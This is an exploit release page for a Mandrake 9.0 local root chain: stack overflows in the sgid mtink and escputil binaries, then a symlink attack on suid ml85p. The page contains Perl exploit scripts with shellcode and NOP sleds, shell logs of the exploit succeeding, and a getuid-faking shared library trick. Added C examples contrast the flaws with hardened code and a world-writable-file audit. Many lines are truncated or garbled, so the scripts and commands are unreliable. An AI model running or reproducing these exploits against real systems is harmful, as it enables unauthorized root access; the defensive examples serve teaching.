Mandrake 9.0 local root exploit

 Priv8 Security -
 priv8mdk90.tar.gz - Mandrake 9.0 local root exploit

 Based on Idefense adv.
 Greets to : coideloko, chroot-, xtc , M|ght, exitus,
overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and
all friends of Priv8 security.

OBS. My english sux...

 OK, our goal is to get root by exploiting ml85p, which is suid root
by default on Mandrake 9.0:

[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
-rwsr-x---    1 root     sys         12344 Set 17 16:40

 You can see that we are going to need group sys to run it, so
first let's get it.
[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x    1 lp       sys        132600 Set 17 16:40
[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x    1 lp       sys         32088 Set 17 16:40

 We have two here that are vulnerable: mtink has a stack overflow on
the HOME environment variable and escputil has a stack overflow on a
command line argument. For more details, read the iDefense advisory.
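The two sgid-sys bugs above are the same shape: a value the caller controls (HOME, or an argument) is copied into a fixed-size stack buffer with no length check. The following is an added example, written for this page and not code from the advisory or from the mtink/escputil sources; the buffer size and the ".printrc" file name are constructed for illustration. It puts the vulnerable shape beside a hardened one, and then beside the fix a set-id program should really use: not trusting HOME at all.

```c
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define PATH_BUF 256          /* constructed buffer size for the example */
#define RC_NAME "/.printrc"   /* constructed file name; not mtink's real one */

/* The vulnerable shape the write-up describes for mtink: a caller-chosen HOME
 * copied into a fixed stack buffer with no length check. Kept here only for
 * contrast; never pass it untrusted input. */
static void build_rc_path_vulnerable(const char *home, char *out) {
    char tmp[PATH_BUF];
    strcpy(tmp, home);          /* unbounded: a HOME longer than tmp overruns the stack */
    strcat(tmp, RC_NAME);
    strcpy(out, tmp);
}

/* Hardened form: validate, then size-check before any byte is copied.
 * An over-long, missing or relative value is rejected rather than silently
 * truncated, because a truncated path is still a path to somewhere.
 * Returns 0 on success, -1 on rejection. */
static int build_rc_path(const char *home, char *out, size_t outlen) {
    if (home == NULL || home[0] != '/')
        return -1;
    size_t need = strlen(home) + strlen(RC_NAME) + 1;   /* +1 for the NUL */
    if (need > outlen)
        return -1;
    int n = snprintf(out, outlen, "%s%s", home, RC_NAME);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Better still for a set-uid/set-gid program: do not consult HOME at all.
 * The environment is under the caller's control; the password database is not. */
static int build_rc_path_for_real_uid(char *out, size_t outlen) {
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL)
        return -1;
    return build_rc_path(pw->pw_dir, out, outlen);
}

int main(void) {
    char out[PATH_BUF];
    build_rc_path_vulnerable("/tmp", out);   /* benign input only; shows the shape */
    printf("vulnerable routine, short input: %s\n", out);
    if (build_rc_path(getenv("HOME"), out, sizeof out) == 0)
        printf("from HOME:   %s\n", out);
    else
        puts("from HOME:   rejected (missing, relative or too long)");
    if (build_rc_path_for_real_uid(out, sizeof out) == 0)
        printf("from passwd: %s\n", out);
    return 0;
}
```

The length check happens before any copy, and rejection is preferred over truncation: a 1056-byte HOME, the size the mtink script below pads its buffer to, is simply refused.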

So here we go....
First we get gid sys by exploiting mtink or escputil; you can choose
whichever one you want.

[wsxz@localhost priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[wsxz@localhost priv8]$ perl 
 Mandrake 9 mtink local sys exploit!!
 usage: offset
 Using address: 0xbffffa80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)

And now we can exploit ml85p

1 - Writing any file on the system!!!

sh-2.05b$ perl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff

Now we check if it worked....

[root@localhost root]# pwd
[root@localhost root]# ls -l hi*
-rw-rw-rw-    1 root     sys             0 Fev 24 03:32
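The step that makes section 1 work is visible in the ml85p script later on this page: `ln -s $file '$b'` plants a symlink at the predictable /tmp name that ml85p will open, and ml85p follows it. The following is an added example, not code from the page or from ml85p, showing that pattern beside the open() call that defeats it; the scratch directory and the names "victim" and "ml85g" are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the write-up relies on: a privileged program opens a predictable
 * name under /tmp for writing. fopen(..., "w") follows a symbolic link and
 * creates the link's target, so a link planted in advance turns the
 * privileged write into a write anywhere on the filesystem.
 * Returns 0 if a file was opened (and immediately closed). */
static int unsafe_create(const char *path) {
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fclose(f);
    return 0;
}

/* Hardened form. O_CREAT|O_EXCL fails with EEXIST if anything already sits at
 * the name, a symlink included, whether or not it dangles; O_NOFOLLOW refuses
 * a link in the final component on its own; mode 0600 keeps the result private
 * instead of depending on the caller's umask. Returns an fd or -1 with errno. */
static int safe_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

struct demo_result {
    int unsafe_created_target; /* 1 if fopen() wrote through the link */
    int safe_refused;          /* 1 if the hardened open() returned -1 */
    int safe_errno;            /* errno from that attempt (EEXIST expected) */
    int target_after_safe;     /* 1 if the target exists after the hardened attempt */
};

/* Scratch-directory demonstration. Builds the same layout the exploit
 * prepares in /tmp: a link "ml85g" pointing at a file "victim" that does not
 * exist yet (all names constructed for the example), then runs both routines
 * against the link. The scratch directory is private (0700) so nothing
 * outside it is touched. */
struct demo_result run_demo(void) {
    struct demo_result r = {0, 0, 0, 0};
    char dir[] = "/tmp/symlink-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "./symlink-demo-XXXXXX");      /* fall back to the cwd */
        if (mkdtemp(dir) == NULL) {
            perror("mkdtemp");
            return r;
        }
    }
    char victim[256], lnk[256];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/ml85g", dir);
    if (symlink(victim, lnk) != 0) {
        perror("symlink");
        rmdir(dir);
        return r;
    }

    /* 1. The unsafe routine follows the link and creates "victim". */
    struct stat st;
    if (unsafe_create(lnk) == 0 && stat(victim, &st) == 0)
        r.unsafe_created_target = 1;
    unlink(victim);                 /* reset: the link dangles again */

    /* 2. The hardened routine refuses the link outright. */
    int fd = safe_create(lnk);
    if (fd < 0) {
        r.safe_refused = 1;
        r.safe_errno = errno;
    } else {
        close(fd);
    }
    r.target_after_safe = (stat(victim, &st) == 0) ? 1 : 0;

    unlink(victim);
    unlink(lnk);
    rmdir(dir);
    return r;
}

int main(void) {
    struct demo_result r = run_demo();
    printf("fopen(\"w\") through the link created the target: %d\n", r.unsafe_created_target);
    printf("O_CREAT|O_EXCL|O_NOFOLLOW refused the link:     %d (%s)\n",
           r.safe_refused, r.safe_refused ? strerror(r.safe_errno) : "-");
    printf("target present after the hardened attempt:     %d\n", r.target_after_safe);
    return 0;
}
```

Two things carry the fix: O_EXCL makes the existence of the planted link an error instead of a hint to follow it, and the explicit 0600 mode means the caller's `umask 000` trick no longer decides what permissions the new file gets.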

2 - Getting root with it ;)

I will do the same thing as in the iDefense advisory, so let's do it..

sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl /etc/
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$ ls -l /etc/
-rw-rw-rw-    1 root     sys             0 Feb 26 00:12
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/ -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/" > /etc/
sh-2.05b$ su -
[root@localhost root]# id
uid=0(root) gid=0(root) grupos=0(root)

It worked, so take care what you write, OK ;)
That's it.
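What section 2 leaves on disk is easy to sweep for: the `ls -l /etc/` line shows a root-owned, zero-byte, world-writable (-rw-rw-rw-) regular file, which no package installs and no sane umask produces. The following is an added example, not code from the page, that audits one directory for exactly that footprint; the scratch directory and the file names "planted", "normal" and "link" are constructed so it can be run offline.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The footprint the write-up leaves behind is a regular file that anyone may
 * write (the -rw-rw-rw- entries in the ls -l output). Returns 1 for such a
 * mode; directories, links and devices are not regular files and return 0. */
int is_world_writable_regular(mode_t mode) {
    return (S_ISREG(mode) && (mode & S_IWOTH)) ? 1 : 0;
}

/* Non-recursive sweep of one directory. Prints every hit with owner uid and
 * size (the planted files are root-owned and empty) and returns the count,
 * or -1 if the directory cannot be read. lstat() is used deliberately so a
 * symlink is judged by its own mode and never by its target's. */
int count_world_writable(const char *dir) {
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;
    int hits = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        char path[4096];
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        struct stat st;
        if (lstat(path, &st) != 0)
            continue;
        if (is_world_writable_regular(st.st_mode)) {
            printf("world-writable: %s (uid %u, %lld bytes)\n",
                   path, (unsigned)st.st_uid, (long long)st.st_size);
            hits++;
        }
    }
    closedir(d);
    return hits;
}

/* Helper for the demo: create an empty file and force its mode regardless of umask. */
static int make_file(const char *path, mode_t mode) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    close(fd);
    return chmod(path, mode);
}

/* Scratch-directory demonstration (all names constructed for the example):
 * one 0666 file mimicking the planted artefact, one ordinary 0644 file and a
 * symlink pointing at the bad one. Returns the hit count, expected 1. */
int run_audit_demo(void) {
    char dir[] = "/tmp/ww-audit-XXXXXX";
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "./ww-audit-XXXXXX");          /* fall back to the cwd */
        if (mkdtemp(dir) == NULL)
            return -1;
    }
    char bad[256], good[256], lnk[256];
    snprintf(bad, sizeof bad, "%s/planted", dir);
    snprintf(good, sizeof good, "%s/normal", dir);
    snprintf(lnk, sizeof lnk, "%s/link", dir);
    make_file(bad, 0666);
    make_file(good, 0644);
    symlink(bad, lnk);          /* mode lrwxrwxrwx, but not S_ISREG, so not a hit */

    int hits = count_world_writable(dir);

    unlink(lnk);
    unlink(good);
    unlink(bad);
    rmdir(dir);
    return hits;
}

int main(void) {
    int hits = run_audit_demo();
    printf("%d world-writable regular file(s) found in the scratch directory\n", hits);
    return hits == 1 ? 0 : 1;
}
```

Pointed at /etc on a real host (`count_world_writable("/etc")`) it reports any such file with its owner, and a root-owned hit is the signal worth chasing; the uid is printed rather than filtered on so the demo can run as an unprivileged user.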


###################################################### escputil local sys exploit.
#     Tested on Mandrake 9.0 only.
#     Based on

$shellcode =
    "\x31\xc0\xb0".                      #setregid(x,x) - where x = x03 sys gid
    "\x03".                              # x = x03 sys gid
    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".  #end setregid()
$size = 1050;
$retaddr = 0xbffff4e0;
$nop = "\x90";
$offset = 0;

if (@ARGV == 1) {
    $offset = $ARGV[0];
    print " Mandrake 9 escputil local sys exploit!!\n";
    print " usage: $0 offset\n";
    for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
        $buffer .= $nop;

    $buffer .= $shellcode;

    print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n";

    $newret = pack('l', ($retaddr +

    for ($i += length($shellcode); $i < $size; $i += 4) {
        $buffer .= $newret;

    exec("/usr/bin/escputil -c -P


###################################################### ml85p local root exploit.
#      This exploit erases any file on the system; you'll need group sys to do it,
#      so run or to get it ;)
#     Tested on Mandrake 9.0 only.
#     Based on

if (@ARGV == 1) {
    $file = $ARGV[0];
    $b = "/tmp/ml85g";
    $b .= time();
    umask(000);                 # so the files ml85p creates come out world-writable (0666)
    system("ln -s $file '$b'"); # plant the link at the name ml85p will open
    print "Lets write some files ok ;p\n";
    print "Now just press enter....\n";
    if (system("/usr/bin/ml85p -s") == -1) {
        print "You cant run ml85p, check if u have gid sys...\n";
} else {
    print "\n!!! ml85p local root exploit by wsxz !!!\n";
    print "    Usage: perl $0



###################################################### mtink local sys exploit.
#     Tested on Mandrake 9.0 only.
#     Based on

$shellcode2 =
    "\x31\xc0\xb0".                      #setregid(x,x) - where x = x03 sys gid
    "\x03".                              # x = x03 sys gid
    "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".  #end setregid()

$size = 1056;
$retaddr = 0xbffffa80;
$nop = "\x90";
$offset = 0;

if (@ARGV == 1) {
    $offset = $ARGV[0];
    print " Mandrake 9 mtink local sys exploit!!\n";
    print " usage: $0 offset\n";

    for ($i = 0; $i < ($size - length($shellcode2) - 4); $i++) {
        $buffer .= $nop;

    $buffer .= $shellcode2;

    print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n";

    $newret = pack('l', ($retaddr +

    for ($i += length($shellcode2); $i < $size; $i += 4) {
        $buffer .= $newret;

    local($ENV{'HOME'}) = $buffer;   # the overflowing value is passed through HOME


